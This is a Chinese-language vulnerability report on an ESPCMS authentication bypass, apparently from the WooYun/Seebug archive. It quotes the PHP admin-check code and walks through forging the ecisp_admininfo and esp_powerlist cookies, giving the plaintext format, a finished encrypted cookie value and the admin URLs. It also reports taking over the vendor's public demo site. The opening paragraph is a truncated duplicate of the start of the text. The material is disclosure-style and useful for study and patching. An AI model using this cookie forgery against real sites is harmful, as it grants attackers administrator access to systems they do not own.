VULHUB ™

### 简要描述： ESPCMS 权限限定绕过直接登录后台 仅测试了 最新版本 然后demo测试进去看了一眼，别的什么也没做。 ### 详细说明： 先看下 后台验证的代码 ``` function softbase($admin_purview = false) { header("Content-Type: text/html; charset=utf-8"); $this->dbmysql(); $this->commandinc(); $this->systemfile(); $this->cachedb(); if ($admin_purview) { $this->admin_purview(); $this->sitelng = $this->getlng(); $action = $this->fun->accept('action', 'R'); if (in_array($action, $this->esp_powerlist) && !in_array('all', $this->esp_powerlist)) { exit('Permissions errors'); } } if ($this->CON['is_gzip'] == 1 && !function_exists('ob_gzhandler')) { ob_start('ob_gzhandler'); } else { ob_start(); } if ($runpage && $this->CON['is_close']) { exit($this->CON['close_content']); } if (!admin_FROM) { include admin_ROOT . adminfile . '/include/admin_language_' . db_lan . '.php'; $this->lng = $ST; unset($ST); } else { $lngpack = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG; if ($this->creat_lanpack($lngpack)) { include admin_ROOT . 'datacache/' ....

### 简要描述： ESPCMS 权限限定绕过直接登录后台 仅测试了 最新版本 然后demo测试进去看了一眼，别的什么也没做。 ### 详细说明： 先看下 后台验证的代码 ``` function softbase($admin_purview = false) { header("Content-Type: text/html; charset=utf-8"); $this->dbmysql(); $this->commandinc(); $this->systemfile(); $this->cachedb(); if ($admin_purview) { $this->admin_purview(); $this->sitelng = $this->getlng(); $action = $this->fun->accept('action', 'R'); if (in_array($action, $this->esp_powerlist) && !in_array('all', $this->esp_powerlist)) { exit('Permissions errors'); } } if ($this->CON['is_gzip'] == 1 && !function_exists('ob_gzhandler')) { ob_start('ob_gzhandler'); } else { ob_start(); } if ($runpage && $this->CON['is_close']) { exit($this->CON['close_content']); } if (!admin_FROM) { include admin_ROOT . adminfile . '/include/admin_language_' . db_lan . '.php'; $this->lng = $ST; unset($ST); } else { $lngpack = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG; if ($this->creat_lanpack($lngpack)) { include admin_ROOT . 'datacache/' . $lngpack . '_pack.php'; } $this->lng = $LANPACK; $runpage = true; } } ``` 调用了下面的函数。 $this->admin_purview(); 然后继续查看代码 ``` function admin_purview() { if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'C'); $gettype = false; } else { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'C'); $gettype = true; } $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode)); $this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE', db_pscode)); list($esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $esp_powerid, $esp_inputclassid, $this->esp_softurl) = $arr_purview; $this->esp_adminuserid = intval($esp_adminuserid); $this->esp_inputclassid = intval($esp_inputclassid); $this->esp_powerid = intval($esp_powerid); if ($gettype) { if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) { $condition = 0; } else { $condition = 1; } } else { if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) { $condition = 0; } else { $condition = 1; } } if ($condition == 0) { if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') { header('location: index.php?archive=adminuser&action=login'); exit(); } } else { if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') { header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter'); exit(); } } } ``` 然后重点验证的是下面的代码 ``` if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) ``` $this->esp_username和$this->esp_adminuserid 可以在cookies中伪造。 而后面的 两个常量如下 ``` admin_AGENT define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']); admin_ClassURL define('admin_ClassURL', 'http://' . $_SERVER['HTTP_HOST'] . substr($_SERVER['PHP_SELF'], 0, strrpos($_SERVER['PHP_SELF'], '/')) . '/'); ``` 可见，可进行伪造。 再来说下查看key 直接可以看索马里大牛的http://wooyun.org/bugs/wooyun-2010-062528 这里就不多说了。 来张截图进行下示例。 [<img src="https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png) 出来之后 然后挨个进行 加密解密测试。 最终可以得出key ### 漏洞证明： 下面我们开始伪造 cookies中ecisp_admininfo的加密前值如下。 ``` 1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL) ``` 下面我拿测试用的agent和classurl进行演示 Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 加密之后 efdd8e8dfc89de8875254f2e96f2eeb2 http://192.168.1.107/adminsoft 加密之后 962c6fbd63e97c6d6db74449a6bef874 password不进行验证，随便输入个wooyun 加密之后 fbb204a4061ffbd41284a84c258c1bfb 然后填充进去 ``` 1|admin|fbb204a4061ffbd41284a84c258c1bfb|efdd8e8dfc89de8875254f2e96f2eeb2|1|1|962c6fbd63e97c6d6db74449a6bef874 ``` 加密 ``` Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo ``` 然后我们可以得出cookies的设定值 ecisp_admininfo 设定为 Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo esp_powerlist 设定为 all 的加密lp-i managementloglistpgid 设定为0 managementmangerlistpgid 设定为0 开始进行伪造管理员 我们先打开 ``` http://192.168.1.107/adminsoft/index.php ``` 这个页面 然后开始填充cookies [<img src="https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png) 然后访问下面的url ``` http://192.168.1.107/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter ``` [<img src="https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png) 好了下面我们来说下demo的 先注册个帐号。 [<img src="https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png) 然后 翻来覆去 获得key b16dd02887<马赛克>eabab<马赛克> 然后我们访问 ``` http://demo.ecisp.cn/adminsoft ``` 再生成cookies 访问 ``` http://demo.ecisp.cn/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter ``` [<img src="https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png)